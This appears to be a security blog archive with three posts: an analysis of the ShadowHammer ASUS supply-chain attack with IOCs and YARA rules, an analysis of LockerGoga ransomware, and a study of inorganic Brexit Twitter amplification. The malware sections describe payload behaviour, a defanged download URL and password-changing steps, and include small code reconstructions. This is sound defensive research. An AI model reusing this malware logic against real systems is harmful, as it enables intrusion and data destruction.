A Hammer Lurking In The Shadows

And then there was ShadowHammer, the supply chain attack on the ASUS Live Update Utility between June and November 2018, which was discovered by Kaspersky earlier this year, and made public a few days ago.

In short, this is how the trojanized Setup.exe works:

  1. An executable embedded in the Resources section has been overwritten by the first-stage payload.
  2. The program logic has been modified in such a way that instead of installing a software update, it executes a payload implemented as a shellcode.
  3. The payload enumerates the MAC addresses on the victim’s system, creates MD5 hashes of them, and searches for these hashes in a large array of hardcoded values.
  4. If there is a match, it downloads hxxps://asushotfix.com/logo.jpg or hxxps://asushotfix.com/logo2.jpg, depending on the payload variant. The downloaded file is expected to be second-stage x86 shellcode, since the payload attempts to execute it within its own process. However, these URLs are no longer accessible.
  5. If there is no match, it creates or updates a file “idx.ini”. (Added in July 2018 – more details below)
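The matching logic in steps 3 and 4 can be sketched in Python. This is an illustrative reconstruction rather than the shellcode's actual code: the hash value is a placeholder, and the exact byte format fed into MD5 is an assumption on our part.

```python
import hashlib

# Placeholder entry; the real payload embeds a large array of hardcoded MD5 hashes.
TARGET_HASHES = {"0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f"}

def mac_md5(mac: str) -> str:
    # The exact byte format the payload hashes is an assumption here.
    return hashlib.md5(mac.encode()).hexdigest()

def is_targeted(macs: list[str]) -> bool:
    # Steps 3-4: a single matching MAC hash selects the machine for the second stage.
    return any(mac_md5(m) in TARGET_HASHES for m in macs)
```

A faithful reimplementation would need to match the payload's exact MAC formatting before hashing, which is why only the overall flow is reproduced here.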

If you’re more interested in the technical details, our colleagues at Countercept have made an excellent write-up here.

More researchers jumped on this threat and wrote their own analyses as well, such as here and here.

In this post we will focus more on the differences between the variants we have discovered, and how the payload evolved over time. We will also cover some findings about the MAC addresses.


  1. June 2018: The beginning.

    In the first known versions, the embedded executable in the Setup.exe resource section has been partially overwritten by another smaller executable that contains the shellcode.
    The executable is not encrypted, and has a PDB string which is remarkable to say the least:


    The number of targeted MAC address hashes was very low. In the earliest sample we found, there were only 18 devices in scope.

    If there is a match, the shellcode will download the file from the following URL and execute it.

  2. Early July 2018: Introduction of the INI file.

    Some interesting functionality was added. If there is NO match with any of the targeted MAC addresses (which will be the case for most devices), the payload will create or update an INI file “idx.ini”. Three different entries are written with a date value corresponding to one week later. Example content if it was created today (2019-03-29):


    The INI file is stored 2 levels up in the directory structure from where setup.exe is stored.

    So if the executable path is

    C:\Program Files (x86)\ASUS\ASUS Live Update\Temp\6\Setup.exe

    then the INI file will be dropped as

    C:\Program Files (x86)\ASUS\ASUS Live Update\idx.ini
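The drop logic described above can be sketched as follows. The INI section and key names are placeholders of ours; only the path derivation (two levels up) and the one-week date value come from the sample's observed behaviour.

```python
import configparser
from datetime import date, timedelta
from pathlib import Path

def drop_idx_ini(setup_exe_path: str) -> str:
    """Write idx.ini two directory levels above the directory holding the executable."""
    ini_path = Path(setup_exe_path).parents[2] / "idx.ini"
    one_week = (date.today() + timedelta(days=7)).isoformat()
    cfg = configparser.ConfigParser()
    # Section and key names are placeholders; the sample's real entries differ.
    cfg["IDX"] = {"entry1": one_week, "entry2": one_week, "entry3": one_week}
    with open(ini_path, "w") as f:
        cfg.write(f)
    return str(ini_path)
```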

    More MAC hashes were added per iteration, increasing the number to over 200 in a sample compiled on 23 July 2018.

  3. Mid August 2018: Going stealthy.

    Then there is a hiatus of a few weeks. Most people were enjoying summer at that time, but it looks like these actors spent that period rewriting a few things to hide their payload better.

    The malicious payload is now fully encrypted, and has become real shellcode, i.e. not part of an executable image. Consequently, the PDB string is gone, and there is no compilation timestamp anymore, which makes determining the exact date of creation trickier. From here on, we resort to the first-seen date.

    The list of targets grew again, to nearly 300 devices.
  4. Early September 2018: A new URL.

    A small but interesting change was that the URL changed to


    Also, a few more hashes were added, totaling 307 entries, the largest number we have encountered.

  5. Late September 2018: Revisiting the targets.

    Until now, the evolution of the targeted MAC addresses was very consistent: the actors only added targets. In other words, an older sample always contained a subset of a newer sample. Things changed during the final period of the attack, which lasted more than a month. The number of hashes started fluctuating – with each new variant, some got removed, while new ones were added. Perhaps the threat actors managed to come up with a shortlist of targets of interest this time?

MAC Addresses Observations

Looking at the list of MAC addresses, it appears that some of them are wireless adapters from different manufacturers. It’s possible that the attackers gathered these by listening on a wireless network. Also, it suggests that the targets are mostly laptops as most of the wireless adapters seem to be Intel / Azurewave / Liteon.

As the chart above shows, there were about 6 MAC addresses that didn’t resolve to any vendor:


0c:5b:8f:27:9a:64, which was found in 8 samples, appears to be a Huawei wireless chip address. It is not assigned to Huawei, but appears to be used in Huawei E3372 devices, a 4G USB stick. This particular MAC address is always checked along with a specific Asustek Computer Inc. MAC address.

00ff5eXXXXXX is always checked along with a VMWare MAC address, which suggests that this MAC address is used in virtualized environments.

In the most recent sample, there were a total of 18 devices of interest. These are the vendor combinations that were checked together as pairs:

  • Hon Hai Precision Ind. Co.,ltd. and Vmware, Inc.
  • Azurewave Technology Inc. and Asustek Computer Inc.
  • Intel Corporate and Asustek Computer Inc.
  • Vmware, Inc. and the 00ff5eXXXXXX MAC address

Indicators of Compromise


SHA-1                                      Date         Hashes   Devices
b0416f8866954196175d7d9a93b9ab505e96712c   2018-06-12   24       18
5039ff974a81caf331e24eea0f2b33579b00d854   2018-06-28   69       50
e01c1047001206c52c87b8197d772db2a1d3b7b4   2018-07-10   75       55
c6bd8969513b2373eafec9995e31b242753119f2   2018-07-16   156      117
2c591802d8741d6aef1a278b9aca06952f035b8f   2018-07-17   197      152
0595e34841bb3562d2c30a1b22ebf20d31c3be86   2018-07-23   294      208
df4df416c819feb06e4d206ea1ee4c8d07c694ad   2018-08-13   404      287
8e0dfaf40174322396800516b282bf16f62267fa   2018-09-05   433      307
4a8d9a9ca776aaaefd7f6b3ab385dbcfcbf2dfff   2018-09-25   141      86
e793c89ecf7ee1207e79421e137280ae1b377171   2018-09-30   75       41
9f0dbf2ba3b237ff5fd4213b65795595c513e8fa   2018-10-12   22       15
e005c58331eb7db04782fdf9089111979ce1406f   2018-10-19   24       18

YARA Rules

// older samples - check the PDB string in the shellcode
rule shadowhammer_pdb
{
    strings:
        $str_pdb = "AsusShellCode.pdb" ascii nocase
    condition:
        all of them
}

// newer samples - check manual patches in the setup.exe
rule shadowhammer_patch
{
    strings:
        $str_msi = "\\419.msi" ascii wide nocase
        $str_upd = "ASUS Live Updata" ascii wide nocase
        $str_ins = "Asusaller Application" ascii wide nocase
    condition:
        2 of them
}
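For ad-hoc triage without YARA installed, the second rule's condition can be approximated in plain Python using the same marker strings. Note that this sketch skips the rule's `wide` (UTF-16) variants, so it is weaker than the YARA rule.

```python
# Marker strings from the shadowhammer_patch rule above.
MARKERS = [b"\\419.msi", b"ASUS Live Updata", b"Asusaller Application"]

def looks_patched(data: bytes) -> bool:
    """Flag a buffer if at least 2 of the 3 markers appear, case-insensitively."""
    lowered = data.lower()
    return sum(m.lower() in lowered for m in MARKERS) >= 2
```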

Analysis of LockerGoga Ransomware

We recently observed a new ransomware variant (which our products detect as Trojan.TR/LockerGoga.qnfzd) circulating in the wild. In this post, we’ll provide some technical details of the new variant’s functionalities, as well as some Indicators of Compromise (IOCs).


Compared to other ransomware variants that use Windows’ CRT library functions, this new variant relies heavily on the less commonly used Boost library. For example, instead of CRT’s rename function, it uses boost::filesystem::rename. This change makes technical analysis more difficult for researchers, as it makes function identification harder.

The functionalities for file enumeration and file encryption are split into different processes. File path sharing happens using the Boost.Interprocess library, which makes it harder to analyze the processes separately.

File encryption

If we execute the sample without any arguments, it moves the executable to the %TEMP% directory with the hard-coded name “tgytutrc{number}.exe” and executes it with the “-m” argument (where “m” stands for “master process”):

As we can see in the screenshot, the main executable uses functions from the Boost library to copy and execute the sample.



The main functionality is inside the “master” process: it enumerates files on the infected system and executes child processes to encrypt them.

If we provide the additional argument “-l”, the process will create a “C:\.log.txt” file and write file paths and error messages to it.

To parse command line arguments, the sample uses the Boost.Program_options library (see the screenshot below).


Before starting the encryption phase, the “master” process enumerates sessions and logs off from all but the current process’s session.

The process uses ProcessIdToSessionId function to get a session associated with the current process.


This is a list of active sessions on a test machine. Since session “1” is the session of the process, it logs off only from session “0”:


After that, the “master” process changes the password for all administrator accounts to “HuHuHUHoHo283283@dJD”.

I’ve created a standard user, but it only changes the password for administrator accounts:


The “master” process creates a “shared memory” using the Boost.Interprocess library and executes child processes (in the same executable) with the argument “-i SM-tgytutrc -s”, where “-i ” specifies a shared section name and “-s” stands for “slave”.

According to Wikipedia: “shared memory is memory that may be simultaneously accessed by multiple programs with an intent to provide communication among them or avoid redundant copies.”

In the screenshot, we see that, after changing passwords, it uses the Boost library to initialize shared memory and execute child processes (“slave” processes):



Next, the “master” process enumerates files and writes their paths (encoded with Base64) in the shared memory.

The process uses the Boost::Filesystem library to query paths, files, and directories:


File paths are encoded with Base64:


Child processes decode the data from the shared memory.
The data in shared memory has the following structure: the first DWORD represents the file index, while the second one represents the size of the Base64-encoded data:
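Our reading of that record layout can be expressed with Python's struct module; the little-endian DWORDs and the UTF-8 path encoding are assumptions, and this is an interpretation of the structure rather than code from the sample.

```python
import base64
import struct

def pack_record(index: int, file_path: str) -> bytes:
    """Build a record the way we believe the master process does:
    index DWORD, size DWORD, then the Base64-encoded file path."""
    payload = base64.b64encode(file_path.encode("utf-8"))
    return struct.pack("<II", index, len(payload)) + payload

def unpack_record(buf: bytes) -> tuple[int, str]:
    """Decode a record the way a slave process would."""
    index, size = struct.unpack_from("<II", buf, 0)
    payload = buf[8:8 + size]
    return index, base64.b64decode(payload).decode("utf-8")
```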


After decoding a file path, a child process generates a key/IV pair using the Crypto++ library.

The “OS_RNG” function uses the CryptGenRandom function from Windows; the rest of the random number generation is handled by the Crypto++ library:
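As a reference point, an OS-backed key/IV generation step, analogous to what the sample does via Crypto++, looks like this in Python. The 16-byte sizes assume 128-bit Rijndael/AES parameters, which we have not verified against the sample.

```python
import os

def generate_key_iv(key_len: int = 16, iv_len: int = 16) -> tuple[bytes, bytes]:
    # os.urandom draws from the OS CSPRNG (backed by the Windows crypto API
    # on Windows, /dev/urandom elsewhere).
    return os.urandom(key_len), os.urandom(iv_len)
```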


Before the encryption, a “slave” process renames a file using Boost::Filesystem::rename function:

Next, the child process encrypts the file’s content using the Rijndael algorithm. It also appends the generated key/IV pair, in encrypted form, to the end of the file. The key/IV pair is encrypted with the public key embedded in the executable:


After it encrypts a file, a child process overwrites the first byte of the encoded data in shared memory with a “0” byte.


Network changes

After the encryption phase, the “master” process enumerates all network interfaces and disables them.

List of active adapters on my test machine:


The “master” process disables them one by one:


Next, it deletes the executable via a “.bat” file which contains commands to delete both the executable and the bat file itself.


At the end it logs off the current process’s session:



Overall, the latest variant of the LockerGoga ransomware is not particularly complex. However, because it uses the Boost and Crypto++ libraries instead of the more common CRT library functions, it is a bit more troublesome for a threat researcher to analyze.

Indicators of compromise (IOCs)


  • C97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15

Hard coded mutexes:

  • MX-tgytutrc

Path of the malicious executable:

  • %APPDATA%\Local\Temp\tgytutrc8.exe

Analysis Of Brexit-Centric Twitter Activity

This is a rather long blog post, so we’ve created a PDF for you to download, if you’d like to read it offline. You can download that from here.

Executive Summary

This report explores Brexit-related Twitter activity occurring between December 4, 2018 and February 13, 2019. Using the standard Twitter API, researchers collected approximately 24 million tweets that matched the word “brexit” published by 1.65 million users.

A node-edge graph created from the collected data was used to delineate pro-leave and pro-remain communities active on Twitter during the collection period. Using these graphs, researchers were able to identify accounts on both sides of the debate that play influential roles in shaping the Brexit conversation on Twitter. A subsequent analysis revealed that while both communities exhibited inorganic activity, this activity was far more pronounced in the pro-leave group. Given the degree of abnormal activity observed, the researchers conclude that the pro-leave Twitter community is receiving support from far-right Twitter accounts based outside of the UK. Some of the exceptional behaviors exhibited by the pro-leave community included:

  • The top two influencers in the pro-leave community received a disproportionate number of retweets, as compared to influencer patterns seen in the pro-remain community
  • The pro-leave group relied on support from a handful of non-authoritative news sources
  • A significant number of non-UK accounts were involved in pro-leave conversations and retweet activity
  • Some pro-leave accounts tweeted a mixture of Brexit and non-Brexit issues (specifically #giletsjaunes, and #MAGA)
  • Some pro-leave accounts participated in the agitation of French political issues (#franceprotests)

The scope of this report is too limited to conclusively determine whether or not there is a coordinated astroturfing campaign underway to manipulate the public or political climate surrounding Brexit. However, it does provide a solid foundation for more investigation into the matter.


Social networks have come under fire for their inability to prevent the manipulation of news and information by potentially malicious actors. These activities can expose users to a variety of threats. Recently, the spread of disinformation and factually inaccurate statements to socially engineer popular opinion has become a significant concern to the public.

Of particular concern is the coordination of actions across multiple accounts in order to amplify specific content and fool underlying algorithms into falsely promoting amplified content to users in their news feeds, searches, and recommendations. Participants in these campaigns can include: fully automated accounts (“bots”), cyborgs (accounts that use a combination of manual and automated actions), full-time human operators, and users who inadvertently amplify content due to their beliefs or political affiliations.

Architects of sophisticated social engineering campaigns, or astroturfing campaigns (fabricated social network interactions designed to deceive the observer into believing that the activity is part of a grass-roots campaign), sometimes create and operate convincing looking personas to assist in the propagation of content and messages relevant to their cause. It is extremely difficult to distinguish these “fake” personas from real accounts.

Identifying suspicious activities in social networks is becoming more and more difficult. Adversaries have learned from their past experiences, and are now using better tactics, building better automation, and creating much more human-like sock puppets. Social networks now employ more sophisticated algorithms for detecting suspicious activity, and this forces adversaries to develop new techniques aimed at evading those detection algorithms. Services that sell Twitter followers, Twitter retweets, YouTube views, YouTube subscribers, app store reviews, TripAdvisor reviews, Facebook likes, Instagram followers, Instagram likes, Facebook accounts, Twitter accounts, eBay reviews, Amazon ratings, and anything else you could possibly imagine (related to social networks) can be purchased cheaply online. These services can all be found with simple web searches. For the more tech-savvy, a plethora of tools exist for automating the control of multiple social media accounts, for automating the creation and publishing of text and video-based content, for scraping and copying web sites, and for automating search engine optimization tasks.  As such, more complex analysis techniques, and much more in-depth study of the data obtainable from social networks is required than ever before.

Because of its open nature, and fully-featured API support, Twitter is an ideal platform for research into suspicious social network activity. By studying what happens on Twitter, we can gain insight into the techniques adversaries use to “game” the platform’s users and underlying algorithms. The findings from such research can help us build more robust recommendation mechanisms for both current and future social networking platforms.


Between December 4, 2018 and February 13, 2019, we used the standard Twitter API (from Python) to collect Twitter data against the search term “brexit”. The collected data was written to disk and then subsequently analyzed (using primarily Python and Jupyter notebooks) in order to search for suspicious activity such as disinformation campaigns, astroturfing, sentiment amplification, or other “meddling” operations.

At the time of writing, our dataset consisted of approximately 24 million tweets published by over 1.65 million users. 18 million of those were retweets published by 1.5 million users from tweets posted by 300,000 unique users. The dataset included 145,000 different hashtags, 412,000 different URLs and 700,000 unique tweets.

Suspicious activity (activity that appears inorganic or unnatural) can be difficult to separate from organic activity on a social network. For instance, a tweet from a user with very few followers will normally fall on deaf ears. However, that user may once in a lifetime post something that ends up going “viral” because it was so catchy it got shared by other users, and eventually by influencers with many followers. Malicious actors can amplify a tweet to similar effect by instructing or coordinating a large number of accounts to share an equally unknown user’s tweet. This can be achieved via bots or manually operated accounts (such as what was achieved by Tweetdeckers in 2017 and 2018). Retweets can also be purchased online. Vendors that provide such services publish the purchased retweets from their own fleets of Twitter accounts, which likely don’t participate in any other related conversations on the platform. Retweets purchased in this way are often published over a period of time (and not all at once, since that would arouse suspicion). Hence, detecting that a tweet has been amplified by such a service (and identifying the accounts that participated in the amplification) is only possible if those retweets are captured as they are published. Finding a small group of users that retweeted one account over several days, and that may have themselves appeared only once in a dataset containing over 20 million tweets and 300,000 users, is rather difficult.

Groups of accounts that heavily retweet similar content or users over and over can be indicative of automation or malicious behaviour, but finding such groups can sometimes be tricky. Nowadays sophisticated bot automation exists that can easily hide the usual tell-tale signs of artificial amplification. Automation can be used to queue a list of tweets to be published or retweeted, randomly select a portion of potentially thousands of slave accounts, and perform actions at random times, while specifically avoiding tweeting at certain times of the day to give the impression that real users are in control of those accounts. Real tweets and tweets from “share” buttons on news sites can be mixed with retweets to improve realism.

Another approach to finding suspicious behaviour on Twitter is to search for account activity patterns indicative of automation. In a vacuum, these patterns cannot be used to conclusively determine whether an account is automated, or designed to act as part of an astroturfing or disinformation campaign. However, identifying accounts with one or more suspicious traits can help lead researchers to other accounts, or suspicious phenomena, which may ultimately lead to finding evidence of foul-play. Here are some traits that may indicate suspiciousness:

  • While it is entirely possible for a bored human to tweet hundreds of times per day (especially when most of the activity is pressing the retweet button), accounts with high tweet volumes can sometimes be indicative of automation. In fact, some of the accounts we found during this research that tweeted at high volume tended to publish hundreds of tweets at certain times during the day, whilst remaining dormant the rest of the time, or published tweets at a uniform volume, with no pauses for sleep.
  • Accounts that are just a few days or weeks old tend to not have thousands of followers, unless they belong to a well-known celebrity who just joined the platform. New accounts that develop huge followings in a short period of time are suspicious, unless those followings can be explained by particular activity or some sort of pre-existing public status.
  • Accounts with a similar number of followers and friends can occasionally be suspicious. For instance, accounts controlled by a bot herder are sometimes programmatically instructed to follow each other, and end up having similar follower/friends counts. However, mechanisms also exist that promote a “follow-back” culture on Twitter. These mechanisms are often present in isolated communities, such as the far-right Twittersphere. Commercial services also exist that automate follow-back actions for accounts that followed them. The fact that the list of accounts followed by a user is very similar to that user’s list of friends can, unfortunately, be indicative of any of the above.
  • Accounts that follow thousands of other accounts, but are themselves followed by only a fraction of that number can occasionally be indicative of automation. Automated accounts that advertise adult services (such as porn, phone sex, “friend finders”, etc.) use this tactic to attract followers. However, there are also certain communities on Twitter that tend to reciprocate follows, and hence following a great deal of accounts (including “egg” accounts) is a way of “fishing” for follow-backs, and normal in those circles.
  • While it is true that many users on Twitter tend to like and retweet content a lot more than they write their own tweets, accounts that retweet more than 99% of the time might be controlled by automation (especially since it’s a very easy thing to automate, and can be used to boost the engagement of specific content). A few accounts that we encountered during our research had one pinned tweet published by “Twitter Web Client” whilst the rest of the account’s tweets were retweets published by “Twitter for Android”. This sort of pattern raises suspicion, since it could indicate that the account was manually created (and seeded with a single hand-written tweet) by a user at a computer, and then subsequently automated.
  • Accounts that publish tweets using apps created with the Twitter API, or from sources that are often associated with automation are not conclusively suspicious, but may warrant further examination. This is covered more extensively later in the article.
  • Temporal analysis techniques (discussed later in this article) can reveal robot-like behaviour indicative of automation. Some accounts are automated by design (e.g. automated marketing accounts, news feeds). However, if an account behaves in an automated fashion, and publishes politically polarizing content, it may be cause for suspicion.
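Several of the traits above can be combined into a simple scoring sketch. The thresholds below are illustrative placeholders, not values we used in our analysis, and the input dictionary shape is our own.

```python
def suspicion_flags(account: dict) -> list[str]:
    """Return which illustrative heuristics an account trips.
    Expected keys: tweets_per_day, account_age_days, followers, friends, retweet_ratio."""
    flags = []
    if account["tweets_per_day"] > 200:
        flags.append("high tweet volume")
    if account["account_age_days"] < 30 and account["followers"] > 10_000:
        flags.append("young account with large following")
    if account["friends"] > 0 and account["followers"] / account["friends"] < 0.1:
        flags.append("follows many, followed by few")
    if account["retweet_ratio"] > 0.99:
        flags.append("almost exclusively retweets")
    return flags
```

As the list above stresses, none of these signals is conclusive on its own; such flags are only a starting point for manual review.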

During the first few weeks of our research, we focused on building up an understanding of the trends and topology of conversations around the Brexit topic. We created a simple tool designed to collect counts and interactions from the previous 24 hours’ worth of data, and present the results in an easily readable format. This analysis included:

  • counts of how many times each user tweeted
  • counts of how many times each user retweeted another user (amplifiers)
  • counts of how many times each user was retweeted by another user (influencers)
  • counts of hashtags seen
  • counts of URLs shared
  • counts of words seen in tweet text
  • a map of interactions between users
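The per-user counts above can be gathered from collected tweet objects with collections.Counter. The tweet dictionaries here are simplified stand-ins for the Twitter API's actual format.

```python
from collections import Counter

def summarize(tweets: list[dict]) -> dict:
    """Tally tweeters, amplifiers (who retweets), influencers (who gets retweeted),
    and hashtags from a list of simplified tweet dicts."""
    tweeters, amplifiers, influencers, hashtags = Counter(), Counter(), Counter(), Counter()
    for t in tweets:
        tweeters[t["user"]] += 1
        for tag in t.get("hashtags", []):
            hashtags[tag] += 1
        if "retweeted_user" in t:
            amplifiers[t["user"]] += 1
            influencers[t["retweeted_user"]] += 1
    return {"tweeters": tweeters, "amplifiers": amplifiers,
            "influencers": influencers, "hashtags": hashtags}
```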

By mapping the interactions between users (users interact when they retweet, mention, or reply to each other), a node-edge graph representation of observed conversations can be built. Here’s a simple representation of what that looks like:

Lines connecting users in the diagram above represent interactions between those users. Communities are groups of nodes within a network that are more densely connected to one another than to other nodes, and can be discovered using community detection algorithms. To visualize the topology of conversation spaces, we used a graph analysis tool called Gephi, which uses the Louvain Method for community detection. For programmatic community detection purposes, we used the “multilevel” algorithm that is part of the python-igraph package (which is very similar to the algorithm used in Gephi). We often used graph analysis and visualization techniques during our research, since they were able to fairly accurately partition conversations between large numbers of accounts. As an example of the accuracy of these tools, the illustration below is a graph visualization created using about 24 hours’ worth of data collected around December 4, 2018.

Names with a larger font indicate Twitter accounts that are mentioned more often. It can be noted from the above illustration that conversations related to pro-Brexit (leave) topics are clustered at the top (in orange) and conversations related to anti-Brexit (remain) topics are clustered at the bottom (in blue). The green cluster represents conversations related to Labour, and the purple cluster contains conversations about Scotland. People familiar with the Twitter users in this visualization will understand how accurately this methodology managed to separate out each political viewpoint. Visualizations like these illustrate that separate groups of users discuss opposing topics, with very little interaction between the two groups. Highly polarized issues, such as the Brexit debate (and many political topics around the world) usually generate graph visualizations that look like the above.

December 11: #franceprotests hashtag

On December 11, 2018, we observed the #franceprotests hashtag trending in our data (something we had not previously seen). Isolating all tweets from 24 hours’ worth of previously collected data, we found 56 separate tweets that included the #franceprotests hashtag. We mapped interactions between these tweets and the users that interacted with them, resulting in this visualization:

From the above visualization, we can clearly observe a large number of users interacting with a single tweet. This particular tweet (id: 1069955399917350912) was responsible for a majority of the occurrences of the #franceprotests hashtag on that day. This is the tweet:

This tweet showed up in our data because of the presence of the #BREXIT hashtag. From this 24 hours’ worth of collected data, we isolated a list of 1047 users that retweeted the above tweet. Interactions between these users across the 24-hour period looked like this:

Of note in the above visualization are accounts such as @Keithbird59Bird (which retweeted pro-leave content at high volume across our entire dataset), @stephenhawes2 (a pro-leave account that exhibits potentially suspicious activity patterns), @SteveMcGill52 (an account that tweets pro-leave, anti-muslim, and US-related right wing content at high volume). The @lvnancy account that published the original tweet is a US-based alt-right account with over 50,000 followers.

At the time of writing, 23 of these 1047 accounts (2.2%) had been suspended by Twitter.

We performed a Twitter history search for “#franceprotests” in order to determine which accounts had been sharing this hashtag. The search captured roughly 5,800 tweets published by 3,617 accounts (retweets are not included in historical searches). Searching back historically allowed us to determine that the current wave of #franceprotests tweets started to pick up momentum around November 28, 2018. In addition to the #franceprotests hashtag, this group of users also published tweets with hashtags related to the yellow vests movement (#yellowvest, #yellowjackets, #giletsjaunes), and to US right-wing topics (#MAGA, #qanon, #wwg1wga). Interactions between the accounts found in that search look like this:

Some of the accounts in this group are quite suspicious looking. For instance, @tagaloglang is an account that claims to be themed towards learning the Tagalog language. The pinned tweet at the top of @tagaloglang’s timeline makes the account appear in-theme when the page loads:

However, scroll down, and you’ll notice that the account frequently publishes political content.

Another odd account is @HallyuWebsite – a Korean-themed account about Kpop. Here’s what the account looks like when you visit it:

Again, this is just a front. Scroll down and you will see plenty of political content.

Both @tagaloglang and @HallyuWebsite look like accounts that might be owned by a “Twitter marketing” service that sells retweets.

The 5,800 tweets captured in this search had accumulated a total of 53,087 retweets by mid-February 2019. Here are a few of the tweets that received the most retweets:

At the time of writing, 66 of the 3,617 accounts (1.83%) identified as historically sharing this hashtag had been suspended.

Throughout our research, we observed many English-language accounts participating in activism related to the French protests, often in conjunction with UK, US, and other far-right themes. We would imagine that a separate research thread devoted to the study of far-right activism around the French protests would likely expose plenty of additional suspicious activity.

December 20: suspicious pro-leave amplification

During our time spent studying the day-to-day user interactions, we became familiar with the names of accounts that most often tweeted, and of those that were most often retweeted. On December 20, 2018 we noticed a few accounts that weren’t normally highly retweeted that made it onto our “top 50” list. We isolated the interactions between these accounts, and the accounts that retweeted them, and produced the following visualization:

As illustrated above, several separate groups of accounts participated in the amplification of a small number of tweets from brexiteer30, jackbmontgomery, unitynewsnet and stop_the_eu. Here is a visualization of tweets from those accounts, and the users who interacted with them:

5,876 accounts participated in the amplification captured on December 20, 2018. In order to discover what other accounts these 5,876 accounts were amplifying, we collected the last 200 tweets from each of the accounts, and mapped all interactions found, generating this graph:

Zooming in on this, we can see that the yellow cluster at the bottom contains US-based “alt-right” Twitter personalities (such as Education4Libs, and MrWyattEarpLA – an account that is now suspended), and US-based non-authoritative news accounts (such as INewsNet).

The large blue center cluster contains many EU-based right-wing accounts (such as Stop_The_EU, darrengrimes_, and BasedPoland), and non-authoritative news sources (such as UnityNewsNet, V_of_Europe). It also contains AmyMek, a radical racist US Twitter personality with over 200,000 followers.

The orange cluster at the top contains interactions with pro-remain accounts. Although we weren’t expecting to see any interactions of this nature, they were most likely introduced by accounts in the dataset that retweet content from both sides of the debate (such as Brexit-themed tweet aggregators).

Many of the 5,876 accounts that participated in the December 20, 2018 amplification contained #MAGA (the Make America Great Again hashtag commonly used by the alt-right), had US cities and states set as their locations, or identified as American in one way or another. At the time of writing, 79 of these 5,876 accounts (1.34%) had been suspended by Twitter.

February 12: non-authoritative news accounts

The presence of interactions with a number of non-authoritative, pro-leave news sources that are supportive of far-right activist Tommy Robinson (such as UnityNewsNet, PoliticalUK, and PoliticaLite) in this data led us to explore the phenomenon a little further. We ran analysis over our entire collected dataset in order to discover which accounts were interacting with, and sharing links to these sources. The data reveals that some users retweeted the accounts associated with these news sources, others shared links directly, and some retweeted content that included those links. Using our collected data, we were able to build up a picture of how these links were being shared between early December and mid-February. The script we ran looked for interactions with the following accounts: “UnityNewsNet”, “AltNewsMedia”, “UK_ElectionNews”, “LivewireNewsUK”, “Newsflash_UK”, “PoliticsUK1”, “Politicaluk”, “politicalite”. It also performed string searches on any URLs embedded in tweets for the following: “unitynewsnet”, “politicalite”, “altnewsmedia”, “www-news”, “patriotnewsflash”, “puknews”.
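As a rough illustration of the filtering the script performed, here is a minimal sketch. The tweet dict layout (`mentions`, `retweeted_from`, `urls`) is assumed for illustration; only the account names and URL substrings come from the actual queries listed above:

```python
TRACKED_ACCOUNTS = {"unitynewsnet", "altnewsmedia", "uk_electionnews",
                    "livewirenewsuk", "newsflash_uk", "politicsuk1",
                    "politicaluk", "politicalite"}
TRACKED_URL_STRINGS = ["unitynewsnet", "politicalite", "altnewsmedia",
                       "www-news", "patriotnewsflash", "puknews"]

def matches_tracked_sources(tweet):
    """True if the tweet interacts with a tracked account or embeds a
    link whose URL contains one of the tracked substrings."""
    interacting = {name.lower() for name in tweet.get("mentions", [])}
    interacting.add(tweet.get("retweeted_from", "").lower())
    if interacting & TRACKED_ACCOUNTS:
        return True
    return any(substring in url.lower()
               for url in tweet.get("urls", [])
               for substring in TRACKED_URL_STRINGS)
```

Running a predicate like this over every collected tweet yields the interaction and link-sharing counts reported below.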

Overall, we discovered that 7,233 accounts had either shared (or retweeted) links to these news sites, or retweeted their associated Twitter accounts. A total of 15,337 retweets were found in the dataset. The UnityNewsNet Twitter account was the most popular news source present in our dataset, receiving 8,119 retweets from a total of 4,185 unique users. In second place was the UK_ElectionNews account with 1,293 retweets from 1,182 unique users, and in third place was politicalite with 494 retweets from 351 unique users.

A total of 9,193 tweets were found in the dataset that shared URLs matching the string searches mentioned above. Again, Unity News Network was the most popular – URLs that matched “unitynewsnet” were tweeted a total of 5,542 times by 2,928 unique users. Politicalite came in second – URLs that matched “politicalite” were tweeted a total of 3,300 times by 2,197 unique users. In third place was Newsflash_UK – URLs that matched “patriotnewsflash” were tweeted a total of 239 times by 65 unique users. Here is a graph visualization of all the activity that took place between the beginning of December 2018 and mid-February 2019:

Names that appear larger in the above visualization are account names that were retweeted more often. We can see more names here than the originally queried accounts because many links to these sites were shared by users retweeting other accounts that shared a link. Here’s a closer zoom-in:

At the time of writing, 130 of the 7,233 accounts (1.79%) identified to be sharing content related to these non-authoritative news sources had been suspended by Twitter.

The figures and illustrations shown above were obtained from a dataset of tweets that matched the term “brexit”. This particular analysis, unfortunately, didn’t give us full visibility into all activity around these “non-authoritative news” accounts and the websites associated with them that happened on Twitter between early December 2018 and mid-February 2019. In order to explore this phenomenon further, we performed historical Twitter searches for each of the account names in question (collecting data from between December 4, 2018 and February 12, 2019). This allowed us to examine tweets and interactions that weren’t captured using the search term “brexit”. Historical Twitter searches only return tweets from the accounts themselves, and tweets where the accounts were mentioned. Unfortunately, no retweets are returned by a search of this kind.

The combined dataset (over all 7 searches) included 30,846 tweets and 12,026 different users.

Combining the data from historical searches against all seven account names, we were able to map interactions between each news account and users that mentioned it. Here’s what it looked like:

Here’s a zoomed-in view of the graph around politicalite and altnewsmedia:

Note the presence of @prisonplanet (Paul Joseph Watson) and @jgoddard230616 (James Goddard, the star of several recent “yellow vests” harassment videos), amongst other highly-mentioned far-right personalities.

Also of interest is the set of users coloured in purple in the following visualization:

The users in the purple cluster were found from the data we collected using a Twitter search for “unitynewsnet”. With the exception of V_of_Europe, each of these accounts is mentioned exactly the same number of times (522 times) by other users in that dataset. This particular phenomenon appears to have been created by a rather long conversation between those 40-odd accounts between January 14 and 16, 2019. The conversation started with a question about where to find “yellow vest”-related news. Since mentions are always inherited between replies, and both V_of_Europe and UnityNewsNet were mentioned in the first tweet in the thread, this explains why these tweets are present in this dataset. Using temporal analysis techniques (explained below), we were able to ascertain that a majority of the involved accounts pause, or tweet at reduced volume, between 06:00 and 12:00 UK time, which is indicative of night time in US time zones. In fact, examining these accounts manually reveals that they are mostly US-based. The V_of_Europe account is a non-authoritative news account (Voice of Europe) with over 200,000 followers.

This interesting finding illustrates the fact that sometimes a suspicious looking trend or spike may present itself when data is viewed from a certain angle. Further inspection of the phenomenon will then prove it to be largely benign.

At the time of writing, 159 of the 12,026 accounts (1.32%) discovered above had been suspended by Twitter.

